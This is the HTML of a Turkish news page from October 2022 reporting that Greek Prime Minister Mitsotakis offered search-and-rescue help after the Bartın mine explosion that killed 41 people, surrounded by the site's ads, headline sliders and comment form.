							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2022/08/2023.png" class="img-responsive center-block" alt="2023KPSS">
														<figcaption class="small-caption">
								<div class="title one-line">2023KPSS</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/resmi-tatillerde-calisan-isciler-tam-yevmiye-ucret-alacak-mi-h53211.html" onclick="window.open('https://www.kamusaati.com/gundem/resmi-tatillerde-calisan-isciler-tam-yevmiye-ucret-alacak-mi-h53211.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2022/08/KAMUSAATİ-YENİ_1.png" class="img-responsive center-block" alt="mahkeme karar">
														<figcaption class="small-caption">
								<div class="title one-line">mahkeme karar</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/gundem/2022-ogrencilere-para-yardimi-basvurusu-1611-tl-ve-basvuru-ekrani-h53125.html" onclick="window.open('https://www.kamusaati.com/gundem/2022-ogrencilere-para-yardimi-basvurusu-1611-tl-ve-basvuru-ekrani-h53125.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2022/08/KAMUSAATİ-YENİ.png" class="img-responsive center-block" alt="">
														<figcaption class="small-caption">
								<div class="title one-line"></div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 1</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/kpss-haberleri/2022-kpss-guncel-bilgiler-cikabilecek-sorular-genel-kultur-2022-kpss-h46575.html" onclick="window.open('https://www.kamusaati.com/kpss-haberleri/2022-kpss-guncel-bilgiler-cikabilecek-sorular-genel-kultur-2022-kpss-h46575.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2021/05/kpss_2022.png" class="img-responsive center-block" alt="kpss güncel">
														<figcaption class="small-caption">
								<div class="title one-line">kpss güncel</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 2</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/sinav-haberleri/acikogretim-kayitlari-ne-zaman-basliyor-2022-aol-acikogretim-h53019.html" onclick="window.open('https://www.kamusaati.com/sinav-haberleri/acikogretim-kayitlari-ne-zaman-basliyor-2022-aol-acikogretim-h53019.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2022/07/aol.png" class="img-responsive center-block" alt="Aöl">
														<figcaption class="small-caption">
								<div class="title one-line">Aöl</div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 0</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
								<div class="umanset-item swiper-slide">
					<a href="https://www.kamusaati.com/saglik/organik-bal-nereden-alinir-dogal-en-iyi-bal-hangisi-turkiyedeki-en-iyi-meshur-erciyes-bal-siparisi-h53000.html" onclick="window.open('https://www.kamusaati.com/saglik/organik-bal-nereden-alinir-dogal-en-iyi-bal-hangisi-turkiyedeki-en-iyi-meshur-erciyes-bal-siparisi-h53000.html'); return false;">
						<figure>
							<span class="news-overlay"></span>
							<img src="https://www.kamusaati.com/images/haberler/ustmanset/2022/07/KAMUSAATİ-YENİ_2.png" class="img-responsive center-block" alt="">
														<figcaption class="small-caption">
								<div class="title one-line"></div>
																<div class="info">
																		<span><i class="fa fa-comment"></i> 8</span>
								</div>
															</figcaption>
													</figure>
					</a>
				</div>
							</div>
		</div>
	</div>
	<div class="clearfix"></div>
<!--Üst Manşet-->
                  <div class="row">
          	<div class="col-md-8 col-xs-12">                            <div id="haberler">




  <div class="haber-kapsa haber-53554">
    <section class="panel panel-default panel-bittersweet">
      <article id="haber">
      <div class="panel-heading">

        <div class="caption">
          <h1 id="haber_baslik">Yunanistan Başbakanı Miçotakis: Türkiye&#039;ye yardıma hazırız</h1>
        </div>


      </div>
              <div class="panel-body">
        <div class="summary">
          <h2>
          <q>Yunanistan Başbakanı Kyriakos Miçotakis, Bartın&#039;daki kömür madeninde meydana gelen patlamadan duyduğu üzüntüyü dile getirerek, &quot;Yunanistan, arama çalışmalarına yardım göndermeye hazır&quot; dedi.</q>
        </h2>
        </div>
          <div class="col-sm-12 reklam reklam130 no-pd"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- yenireklams 336*280 -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-6097435963991227"
 data-ad-slot="8060082953"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div><div class="clearfix"></div>                  <figure class="row">
            <div class="news-overlay"></div>
            <img src="https://www.kamusaati.com/images/haberler/2022/10/yunanistan_basbakani_micotakis_turkiye_ye_yardima_haziriz_h53554_b9b83.png" class="img-responsive center-block" alt="Yunanistan Başbakanı Miçotakis: Türkiye&#039;ye yardıma hazırız">
            <figcaption class="tools">
              

                        <div class="hs-editor">
                            <div class="hs-editor-img pull-left">
                <img src="https://www.kamusaati.com/images/yazarlar/p10njr7f.png" alt="Kamusaati" width="50" />
              </div>
                            <div class="hs-editor-name pull-left">
                Kamusaati              </div>
            </div>
              


              <span class="tarih-degistir" data-date="2022-10-16 00:37:48" content="2022-10-16T00:37:48+02:00"><i class="fa fa-clock-o"></i> 16 Ekim 2022 Pazar 00:37</span>
                            <span class="hidden-xs"><i class="fa fa-comment"></i> 0</span>
              <span class="pull-right hidden-xs">
                <span class="pull-left">
                  <a href="javascript:font_up(53554)" class="text_bigger">A <sup>+</sup></a>
                  <a href="javascript:font_down(53554)" class="text_smaller">A <sup>-</sup></a>
                </span>
                <span class="pull-left"><a href="javascript:window.print()"><i class="fa fa-print"></i> Yazdır</a></span>
              </span>
            </figcaption>
          </figure>
                <div class="share share-haber-53554"></div>
        <hr>
                          <div class="pull-left reklam reklam131 reklam-m-r no-pd_left m-b-xs"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- YENİ MASAÜSTÜ -->
<ins class="adsbygoogle"
 style="display:inline-block;width:336px;height:280px"
 data-ad-client="ca-pub-6097435963991227"
 data-ad-slot="3193934937"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>          <div id="newstext_53554" class="text">
            <p>Son dönemde Türkiye'ye yönelik gerilimi tırmandıran açıklamalarda bulunan Yunanistan cephesi, bu seferki çağrısıyla şaşırttı.</p><div class="p_ad"></div>

<p>Yunanistan Başbakanı Kyriakos Miçotakis, Bartın'ın Amasra ilçesindeki madende meydana gelen ve 41 kişinin hayatını kaybettiği patlama dolayısıyla Twitter hesabından mesaj yayınladı.</p>

<h4>"Yunanistan, arama çalışmalarına yardım göndermeye hazır"</h4>

<p>Miçotakis, <em><strong>"Türkiye'nin Bartın ilinde meydana gelen korkunç maden patlaması ve can kaybını duymak üzücü. Yunanistan, arama çalışmalarına yardım göndermeye hazır" </strong></em>dedi.</p>

<h4>Dendias da Çavuşoğlu'na mesaj gönderdi</h4>

<p>Yunanistan Dışişleri Bakanı Nikos Dendias da Dışişleri Bakanı Mevlüt Çavuşoğlu'na gönderdiğini taziye mesajında, <em><strong>"Trajik can kaybından derin üzüntü duyduğunu"</strong></em> belirterek, <em><strong>"Yaslı ailelere başsağlığı, yaralılara acil şifalar diliyoruz"</strong></em> ifadelerini kullandı.</p>

<p></p></p>                      </div>
          </br>Kaynak: <strong>Kamu Saati Özel</strong>            <div class="col-sm-12 reklam reklam136 no-pd"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- ESNEK HEM GÖRÜNTÜLÜ -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-6097435963991227"
 data-ad-slot="3647831709"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div><div class="clearfix"></div>                                         
                                            <div id="yorumyaz53554"></div>
                    </div>
                     </article>
                  </section>

                            <section class="panel panel-default panel-aqua">
                <div class="panel-heading">
                    <div class="caption">
                          <i class="fa fa-bookmark fa-lg fa-fw"></i>
                                              </div>
                </div>
                <div class="panel-body">
                  <div class="row">
                                        <div class="col-sm-4">
                      <div class="media-item">
                        <a href="https://www.kamusaati.com/gundem/cumhurbaskani-erdogan-dan-maden-sehidi-ailesine-ziyaret-h53553.html" target="_blank">
                          <figure>
                            <img src="https://www.kamusaati.com/images/haberler/thumbs/2022/10/cumhurbaskani-erdogan-dan-maden-sehidi-ailesine-ziyaret_e3a24.jpg" alt="Cumhurbaşkanı Erdoğan&#039;dan maden şehidi ailesine ziyaret" class="img-responsive center-block">
                            <figcaption class="small-caption">
                              <div class="title one-line">Cumhurbaşkanı Erdoğan&#039;dan maden şehidi ailesine ziyaret</div>
                              <div class="info">
                                                                <span><i class="fa fa-comment"></i> 0</span>
                              </div>
                            </figcaption>
                          </figure>
                        </a>
                      </div>
                    </div>
                                        <div class="col-sm-4">
                      <div class="media-item">
                        <a href="https://www.kamusaati.com/gundem/chp-genel-baskan-yardimcisi-gokcenden-partisine-maden-sehidi-h53552.html" target="_blank">
                          <figure>
                            <img src="https://www.kamusaati.com/images/haberler/thumbs/2022/10/chp_genel_baskan_yardimcisi_gokcenden_partisine_maden_sehidi_diye_bir_sey_yok_h53552_bf683.png" alt="CHP Genel Başkan Yardımcısı Gökçen’den partisine: Maden şehidi diye bir şey yok" class="img-responsive center-block">
                            <figcaption class="small-caption">
                              <div class="title one-line">CHP Genel Başkan Yardımcısı Gökçen’den partisine: Maden şehidi diye bir şey yok</div>
                              <div class="info">
                                                                <span><i class="fa fa-comment"></i> 0</span>
                              </div>
                            </figcaption>
                          </figure>
                        </a>
                      </div>
                    </div>
                                        <div class="col-sm-4">
                      <div class="media-item">
                        <a href="https://www.kamusaati.com/gundem/bartin-daki-maden-faciasinda-bilanco-h53551.html" target="_blank">
                          <figure>
                            <img src="https://www.kamusaati.com/images/haberler/thumbs/2022/10/bartin-daki-maden-faciasinda-bilanco_e3aff.jpg" alt="Bartın&#039;daki maden faciasında bilanço" class="img-responsive center-block">
                            <figcaption class="small-caption">
                              <div class="title one-line">Bartın&#039;daki maden faciasında bilanço</div>
                              <div class="info">
                                                                <span><i class="fa fa-comment"></i> 0</span>
                              </div>
                            </figcaption>
                          </figure>
                        </a>
                      </div>
                    </div>
                                      </div>
                </div>
            </section>
                                                                    <div class="comment">
      <div class="panel panel-default panel-aqua comment-new no-mg" id="p_id53554">
  <div class="panel-heading">
    <div class="caption">
      <i class="fa fa-commenting-o fa-fw"></i>
      <b>Yorum Ekle</b>
    </div>
  </div>
  <div id="yorumpaneli" class="panel-body">
    <div class="media">
      <form  name="comment" class="comment_form comment_id53554" id="addcomment">
        <div class="media-left hidden-xs">
          <div class="media-object">
                          <img src="https://www.kamusaati.com/_themes/hs-royal/images/no_author.jpg" alt="Avatar" class="img-rounded"/>            </div>
          </div>
          <div class="media-body">
            <div class="form-group row">
              <div class="col-sm-5 col-xs-12">
                <div class="input-group">
                  <span class="input-group-addon">İsim</span>
                  <input name="isim"  class="form-control isim" type="text"  id="isim"  title="İsim" />
                  </div>
                </div>
              </div>
              <div class="form-group">
                <textarea name="yorum" maxlength="1000" class="form-control" rows="3" id="comment_field" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea>
              </div>
              <input type="hidden" name="hid" value="53554" />
              <input type="hidden" name="uid" value="0" />
              <input type="hidden" name="tip" value="haber" />
              <input type="hidden" name="cevap" value="" class="answer" />
              <input type="hidden" name="cevap_id" value="0" class="cevap_id" />
              <input type="hidden" name="token" value="2cb1e3bb4570276ca3712ea10f5d4fad36d46292" />
      <div class="alert alert-info answer" style="display:none;"><b>@name</b> kişiye yanıt olarak<a class="close kaldir" href="javascript:ckaldir(53554)">&times;</a></div>
              <div class="form-group text-right">
                <button id="input-submit" onclick="javascript:comment_send(53554);return false;" class="btn btn-success btn-sm btn-icon-left"><i class="fa fa-send"></i> GÖNDER</button>
              </div>
            </div>
          </form>
        </div>
      </div>
      <div class="alert alert-success">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div>
      <div class="alert alert-block alert-danger fade in">
        <button type="button" class="close" data-dismiss="alert">×</button>
          <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, müstehcen, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir.        </div>
    </div>
    <div class="panel panel-default panel-aqua comment-list">
    <div class="panel-body">
      <div class="panel-body">

        <!-- Nav tabs -->
        <ul class="nav nav-tabs" role="tablist">
                                    <li role="presentation" class="active">
                <a href="#facebook_comments53554" aria-controls="facebook_comments53554" class="background-fb" role="tab" data-toggle="tab" aria-expanded="false">
                  <i class="fa fa-facebook-square fa-fw"></i> <strong class="hidden-xs hidden-sm">Facebook Yorumları</strong>
                  <span class="badge color-fb"><fb:comments-count href="https://www.kamusaati.com/gundem/yunanistan-basbakani-micotakis-turkiye-ye-yardima-haziriz-h53554.html">0</fb:comments-count></span>
                </a>
              </li>
                          </ul>
            <!-- [Panel Tabs:Finish] -->

            <!-- Tab panes -->
            <div class="tab-content">
                                                <div role="tabpanel" class="tab-pane fade in active" id="facebook_comments53554">
                    <div class="row-fluid">
                      <div id="fb-root"></div>
                      <script>(function(d, s, id) {
                        var js, fjs = d.getElementsByTagName(s)[0];
                        if (d.getElementById(id)) return;
                        js = d.createElement(s); js.id = id;
                        js.src = "//connect.facebook.net/tr-TR/all.js#xfbml=1";
                        fjs.parentNode.insertBefore(js, fjs);
                      }(document, 'script', 'facebook-jssdk'));</script>
                      <div class="fb-comments" data-href="https://www.kamusaati.com/gundem/yunanistan-basbakani-micotakis-turkiye-ye-yardima-haziriz-h53554.html" data-width="603" data-colorscheme="light" data-numposts="10"></div>
                    </div> <!-- #facebookpanel -->
                  </div>
                                  </div>
                <!-- Tab panes -->
              </div>
            </div>
          </div>
        </div>
                    
<span class="hidden-modul" style="display:none">haber</span>
<span class="hidden-id" style="display:none">53554</span>
<span class="hidden-sayfa" style="display:none">false</span>
</div>
</div>
              </div>

          	<aside class="col-md-4 col-xs-12">
        <!--Günün Manşetleri-->
	<div class="panel panel-default panel-bittersweet panel-gununmansetleri">
		<div class="panel-heading">
			<div class="caption">
				<i class="fa fa-quote-left fa-fw"></i>
				<b>Günün</b> Manşetleri			</div>
		</div>
		<div class="panel-body">
			<div class="today-headlines-slider">
				<div class="swiper-wrapper">
											<div class="news-item swiper-slide">
						<a href="https://www.kamusaati.com/gundem/yunanistan-basbakani-micotakis-turkiye-ye-yardima-haziriz-h53554.html">
								<figure>
									<span class="news-overlay"><i class="fa fa-plus-circle"></i></span>
									<img src="https://www.kamusaati.com/images/haberler/2022/10/yunanistan_basbakani_micotakis_turkiye_ye_yardima_haziriz_h53554_b9b83.png" class="img-responsive center-block" alt="Yunanistan Başbakanı Miçotakis: Türkiye&#039;ye yardıma hazırız">
								</figure>
							</a>
							<div class="item-detail">
								<a href="https://www.kamusaati.com/gundem/yunanistan-basbakani-micotakis-turkiye-ye-yardima-haziriz-h53554.html" class="title one-line">Yunanistan Başbakanı Miçotakis: Türkiye&#039;ye yardıma hazırız</a>
								<div class="summary faint-text line-2">
									Yunanistan Başbakanı Kyriakos Miçotakis, Bartın&#039;daki kömür madeninde meydana gelen patlamadan duyduğu üzüntüyü dile getirerek, &quot;Yunanistan, arama çalışmalarına yardım göndermeye hazır&quot; dedi.								</div>
							</div>
						</div>
											<div class="news-item swiper-slide">
						<a href="https://www.kamusaati.com/gundem/cumhurbaskani-erdogan-dan-maden-sehidi-ailesine-ziyaret-h53553.html">
								<figure>
									<span class="news-overlay"><i class="fa fa-plus-circle"></i></span>
									<img src="https://www.kamusaati.com/images/haberler/2022/10/cumhurbaskani-erdogan-dan-maden-sehidi-ailesine-ziyaret_e3a24.jpg" class="img-responsive center-block" alt="Cumhurbaşkanı Erdoğan&#039;dan maden şehidi ailesine ziyaret">
								</figure>
							</a>
							<div class="item-detail">
								<a href="https://www.kamusaati.com/gundem/cumhurbaskani-erdogan-dan-maden-sehidi-ailesine-ziyaret-h53553.html" class="title one-line">Cumhurbaşkanı Erdoğan&#039;dan maden şehidi ailesine ziyaret</a>
								<div class="summary faint-text line-2">
									Facia bölgesine giden Cumhurbaşkanı Erdoğan, olayda can veren Selçuk Ayvaz&#039;ın acılı ailesine taziyede bulundu. Ayvaz&#039;ın bir hafta sonra 3&#039;üncü kez baba olacağı öğrenildi.								</div>
							</div>
						</div>
											<div class="news-item swiper-slide">
						<a href="https://www.kamusaati.com/gundem/chp-genel-baskan-yardimcisi-gokcenden-partisine-maden-sehidi-h53552.html">
								<figure>
									<span class="news-overlay"><i class="fa fa-plus-circle"></i></span>
									<img src="https://www.kamusaati.com/images/haberler/2022/10/chp_genel_baskan_yardimcisi_gokcenden_partisine_maden_sehidi_diye_bir_sey_yok_h53552_bf683.png" class="img-responsive center-block" alt="CHP Genel Başkan Yardımcısı Gökçen’den partisine: Maden şehidi diye bir şey yok">
								</figure>
							</a>
							<div class="item-detail">
								<a href="https://www.kamusaati.com/gundem/chp-genel-baskan-yardimcisi-gokcenden-partisine-maden-sehidi-h53552.html" class="title one-line">CHP Genel Başkan Yardımcısı Gökçen’den partisine: Maden şehidi diye bir şey yok</a>
								<div class="summary faint-text line-2">
									CHP Genel Başkan Yardımcısı Gökçe Gökçen, CHP&#039;nin kurumsal sosyal medya hesabından yapılan paylaşımdaki &#039;maden şehidi&#039; ifadesine tepki gösterdi.								</div>
							</div>
						</div>
											<div class="news-item swiper-slide">
						<a href="https://www.kamusaati.com/gundem/bartin-daki-maden-faciasinda-bilanco-h53551.html">
								<figure>
									<span class="news-overlay"><i class="fa fa-plus-circle"></i></span>
									<img src="https://www.kamusaati.com/images/haberler/2022/10/bartin-daki-maden-faciasinda-bilanco_e3aff.jpg" class="img-responsive center-block" alt="Bartın&#039;daki maden faciasında bilanço">
								</figure>
							</a>
							<div class="item-detail">
								<a href="https://www.kamusaati.com/gundem/bartin-daki-maden-faciasinda-bilanco-h53551.html" class="title one-line">Bartın&#039;daki maden faciasında bilanço</a>
								<div class="summary faint-text line-2">
									Süleyman Soylu, ölü sayısını 40 olarak açıklarken, Cumhurbaşkanı Erdoğan, bu sayının 41&#039;e yükseldiğini belirtti.								</div>
							</div>
						</div>
											<div class="news-item swiper-slide">
						<a href="https://www.kamusaati.com/personel-alimi/aile-ve-sosyal-hizmetler-bakanligi-12-sozlesmeli-bilisim-personeli-h53550.html">
								<figure>
									<span class="news-overlay"><i class="fa fa-plus-circle"></i></span>
									<img src="https://www.kamusaati.com/images/haberler/2022/10/aile_ve_sosyal_hizmetler_bakanligi_12_sozlesmeli_bilisim_personeli_alacak_h53550_010b2.gif" class="img-responsive center-block" alt="Aile ve Sosyal Hizmetler Bakanlığı 12 sözleşmeli bilişim personeli alacak">
								</figure>
							</a>
							<div class="item-detail">
								<a href="https://www.kamusaati.com/personel-alimi/aile-ve-sosyal-hizmetler-bakanligi-12-sozlesmeli-bilisim-personeli-h53550.html" class="title one-line">Aile ve Sosyal Hizmetler Bakanlığı 12 sözleşmeli bilişim personeli alacak</a>
								<div class="summary faint-text line-2">
									Aile ve Sosyal Hizmetler Bakanlığı 12 sözleşmeli bilişim personeli alacak. Son başvuru tarihi 31 ekim 2022								</div>
							</div>
						</div>
											<div class="news-item swiper-slide">
						<a href="https://www.kamusaati.com/gundem/sigaraya-zam-mi-geldi-guncel-sigara-fiyatlari-ne-kadar-oldu-14-ekim-h53549.html">
								<figure>
									<span class="news-overlay"><i class="fa fa-plus-circle"></i></span>
									<img src="https://www.kamusaati.com/images/haberler/2022/10/sigaraya_zam_mi_geldi_guncel_sigara_fiyatlari_ne_kadar_oldu_14_ekim_2022_h53549_fa9a2.png" class="img-responsive center-block" alt="Sigaraya zam mı geldi?, Güncel sigara fiyatları ne kadar oldu? 14 Ekim 2022">
								</figure>
							</a>
							<div class="item-detail">
								<a href="https://www.kamusaati.com/gundem/sigaraya-zam-mi-geldi-guncel-sigara-fiyatlari-ne-kadar-oldu-14-ekim-h53549.html" class="title one-line">Sigaraya zam mı geldi?, Güncel sigara fiyatları ne kadar oldu? 14 Ekim 2022</a>
								<div class="summary faint-text line-2">
									Sigara zammı bu akşam saatlerinde gündeme oturdu. Tekel Bayileri Yardımlaşma Derneği Başkanı Erol Dündar, sosyal medya hesabından sigaraya yarından itibaren geçerli olmak üzere zam geleceğini paylaştı. Tütün mamulleri kullanıcıları gelen zam haberiyle beraber güncel sigara fiyatlarını sorgulama başladılar. Peki, Güncel sigara fiyatları ne kadar oldu? İşte sigara liste fiyatları...								</div>
							</div>
						</div>
									</div>
				<div class="panel-pagination swiper-pagination"></div>
			</div>
		</div>
	</div>
		<!--Günün Manşetleri-->
<!--Sosyal Ağlar-->
	<div class="panel panel-default panel-aqua panel-sosyal">
		<div class="panel-heading">
			<div class="caption">
				<i class="fa fa-thumbs-up fa-fw"></i>
				<b>Sosyal</b> Ağlar			</div>
		</div>
		<div class="panel-body text-center social-box">
			      <div class="hs-social-block hs-facebook">
        <i class="fa fa-facebook"></i><a href="//facebook.com/Habersondakikaa/" class="hs-sdch" target="_blank" rel="nofollow"> <strong class="hs-facebook-count"></strong> BEĞENİ</a>
        <a href="//facebook.com/Habersondakikaa/" class="pull-right hs-sdch" target="_blank" rel="nofollow">Beğen</a>
      </div>
                  <div class="hs-social-block hs-twitter">
          <i class="fa fa-twitter"></i><a href="//twitter.com/kamusaaticom" class="hs-sdch" target="_blank" rel="nofollow"><strong class="hs-twitter-count">3.6B</strong> TAKİPÇİ</a>
          <a href="//twitter.com/kamusaaticom" class="pull-right hs-sdch" target="_blank" rel="nofollow">Takip Et</a>
      </div>
                  <div class="hs-social-block hs-youtube">
          <i class="fa fa-youtube"></i><a href="https://www.youtube.com/channel/UCcDbuYItq1cY_1ITKBAv5Jg" class="hs-sdch" target="_blank" rel="nofollow"><strong class="hs-youtube-count">40</strong> ABONE</a>
          <a href="https://www.youtube.com/channel/UCcDbuYItq1cY_1ITKBAv5Jg" class="pull-right hs-sdch" target="_blank" rel="nofollow">Abone Ol</a>
      </div>
            		</div>
	</div>
<!--Sosyal Ağlar-->
<!--Özel Haber-->
<div class="panel panel-default panel-bittersweet panel-ozelhaber">
	<div class="panel-heading">
		<div class="caption">
			<i class="fa fa-file-text fa-fw"></i>
			<b>Özel</b> Haber		</div>
	</div>
	<div class="panel-body">
		<div class="news-list">
			<ul class="list-group">
									<li class="list-group-item">
						<span class="badge">1</span>
						<a href="https://www.kamusaati.com/kpss-haberleri/2023-kpss-guncel-bilgiler-2023-kpss-cikabilecek-sorular-genel-kultur-h53224.html" target="_blank" class="strong one-line">2023 KPSS Güncel Bilgiler, 2023 KPSS Çıkabilecek Sorular, Genel Kültür ve Genel Yetenek</a>
					</li>
										<li class="list-group-item">
						<span class="badge">2</span>
						<a href="https://www.kamusaati.com/saglik/dogal-toros-atom-kuvvet-macunu-nedir-ne-ise-yarartoros-atomu-macunu-h41724.html" target="_blank" class="strong one-line">Doğal Toros Atom Kuvvet Macunu Nedir ne işe yarar,Toros atomu macunu yorumları</a>
					</li>
										<li class="list-group-item">
						<span class="badge">3</span>
						<a href="https://www.kamusaati.com/gundem/incesu-uzum-festivalinde-bir-ilk-festivale-2-bomba-sanatci-geliyor-h53213.html" target="_blank" class="strong one-line">İncesu Üzüm festivalinde Bir İlk... Festivale 2 Bomba Sanatçı Geliyor</a>
					</li>
										<li class="list-group-item">
						<span class="badge">4</span>
						<a href="https://www.kamusaati.com/kpss-haberleri/2022-kpss-guncel-bilgiler-cikabilecek-sorular-genel-kultur-2022-kpss-h46575.html" target="_blank" class="strong one-line"><b><span style="color:#ff0000">2022 KPSS Güncel Bilgiler Çıkabilecek Sorular Genel Kültür 2022 KPSS</span></b></a>
					</li>
										<li class="list-group-item">
						<span class="badge">5</span>
						<a href="https://www.kamusaati.com/gundem/typ-lilere-kadro-aciklamasi-2022-typ-kadrosu-ne-zaman-verilecek-h50680.html" target="_blank" class="strong one-line">TYP&#039;lilere Kadro Açıklaması 2022!, TYP kadrosu ne zaman verilecek? İşte Detaylar</a>
					</li>
									</ul>
			</div>
		</div>
	</div>
<!--Özel Haber-->
<!--Alıntı Yazarlar-->
  <!--Alıntı Yazarlar-->
<!--Çok Yorumlanan Haberler-->
<!--Çok Yorumlanan Haberler-->
<!--Çok Okunan Haberler-->
					<div class="panel panel-default panel-aqua panel-cokokunan">
				<div class="panel-heading">
					<div class="caption">
						<i class="fa fa-file-text fa-fw"></i>
						<b>Çok</b> Okunanlar					</div>
				</div>
				<div class="panel-body">
					<div class="news-list">
						<ul class="list-group">
															<li class="list-group-item">
									<span class="badge">1</span>
									<a href="https://www.kamusaati.com/gundem/chp-genel-baskan-yardimcisi-gokcenden-partisine-maden-sehidi-h53552.html" target="_blank" class="strong one-line">CHP Genel Başkan Yardımcısı Gökçen’den...</a>

								</li>
																<li class="list-group-item">
									<span class="badge">2</span>
									<a href="https://www.kamusaati.com/gundem/cumhurbaskani-erdogan-dan-maden-sehidi-ailesine-ziyaret-h53553.html" target="_blank" class="strong one-line">Cumhurbaşkanı Erdoğan&#039;dan maden...</a>

								</li>
															</ul>
						</div>
					</div>
				</div>
				<!--Çok Okunan Haberler-->
<!--Hava Durumu-->
<!--Hava Durumu-->
<!--Namaz Vakitleri-->
<!--Namaz Vakitleri-->
<!--Para Piyasası-->
		<!--Para Piyasası-->
<!--Lig Puan Tablosu-->
<!--Lig Puan Tablosu-->
<!--Anketler-->
<!--Anketler-->
<!--Son Yorumlar-->
<div class="panel panel-default panel-aqua panel-sonyorumlar">
	<div class="panel-heading">
		<div class="caption">
			<i class="fa fa-comments fa-fw"></i>
			<b>Son</b> Yorumlar		</div>
	</div>
	<div class="panel-body">
		<div class="news-list">
			<ul class="list-group">
				   					<li class="list-group-item">
						<a href="https://www.kamusaati.com/gundem/typ-lilere-kadro-aciklamasi-2023-2023-typ-kadrosu-ne-zaman-h53458.html#comment_33046" target="_blank">Typ li olarak bizde kadro istiyoruz ve yaş...</a>
					</li>
										<li class="list-group-item">
						<a href="https://www.kamusaati.com/gundem/typ-lilere-kadro-aciklamasi-2022-typ-kadrosu-ne-zaman-verilecek-h50680.html#comment_33045" target="_blank">Nolur çok ihtiyacımız var gelsin kadro</a>
					</li>
										<li class="list-group-item">
						<a href="https://www.kamusaati.com/gundem/typ-lilere-kadro-aciklamasi-2023-2023-typ-kadrosu-ne-zaman-h53458.html#comment_33044" target="_blank">esim yok bir oglum var bu yil bends ise...</a>
					</li>
										<li class="list-group-item">
						<a href="https://www.kamusaati.com/gundem/typ-lilere-kadro-aciklamasi-2023-2023-typ-kadrosu-ne-zaman-h53458.html#comment_33043" target="_blank">Bir kurum da iskurun TYP bünyesinde calisiyorum...</a>
					</li>
										<li class="list-group-item">
						<a href="https://www.kamusaati.com/gundem/typ-lilere-kadro-aciklamasi-2022-typ-kadrosu-ne-zaman-verilecek-h50680.html#comment_33042" target="_blank">TYP KADRO GELSİN</a>
					</li>
									</ul>
			</div>
		</div>
</div>
<!--Son Yorumlar-->
<!--Karikatür-->
<!--Karikatür-->
<!--E-gazete-->
 <!--E-gazete-->
<!--Biyografi-->
<!--Biyografi-->
<!--Sayfalar-->
<!--Sayfalar-->
<!--Arşiv-->
<div class="panel panel-default panel-bittersweet panel-arsiv">
	<div class="panel-heading">
		<div class="caption">
			<i class="fa fa-university fa-fw"></i>
			<b>Arşiv</b>		</div>
	</div>
	<div class="panel-body arsiv">
		<form action="https://www.kamusaati.com/?m=arsiv" class="form-inline" method="post" name="arsiv" >
			<select name="gun" class="day form-control">
									<option value="01" >01</option>
									<option value="02" >02</option>
									<option value="03" >03</option>
									<option value="04" >04</option>
									<option value="05" >05</option>
									<option value="06" >06</option>
									<option value="07" >07</option>
									<option value="08" >08</option>
									<option value="09" >09</option>
									<option value="10" >10</option>
									<option value="11" >11</option>
									<option value="12" >12</option>
									<option value="13" >13</option>
									<option value="14" >14</option>
									<option value="15" >15</option>
									<option value="16" selected>16</option>
									<option value="17" >17</option>
									<option value="18" >18</option>
									<option value="19" >19</option>
									<option value="20" >20</option>
									<option value="21" >21</option>
									<option value="22" >22</option>
									<option value="23" >23</option>
									<option value="24" >24</option>
									<option value="25" >25</option>
									<option value="26" >26</option>
									<option value="27" >27</option>
									<option value="28" >28</option>
									<option value="29" >29</option>
									<option value="30" >30</option>
									<option value="31" >31</option>
							</select>
			<select name="ay" class="month form-control">
									<option value="01" >Ocak</option>
									<option value="02" >Şubat</option>
									<option value="03" >Mart</option>
									<option value="04" >Nisan</option>
									<option value="05" >Mayıs</option>
									<option value="06" >Haziran</option>
									<option value="07" >Temmuz</option>
									<option value="08" >Ağustos</option>
									<option value="09" >Eylül</option>
									<option value="10" selected>Ekim</option>
									<option value="11" >Kasım</option>
									<option value="12" >Aralık</option>
							</select>
			<select name="yil" class="year form-control">
									<option value="2022" selected>2022</option>
									<option value="2021" >2021</option>
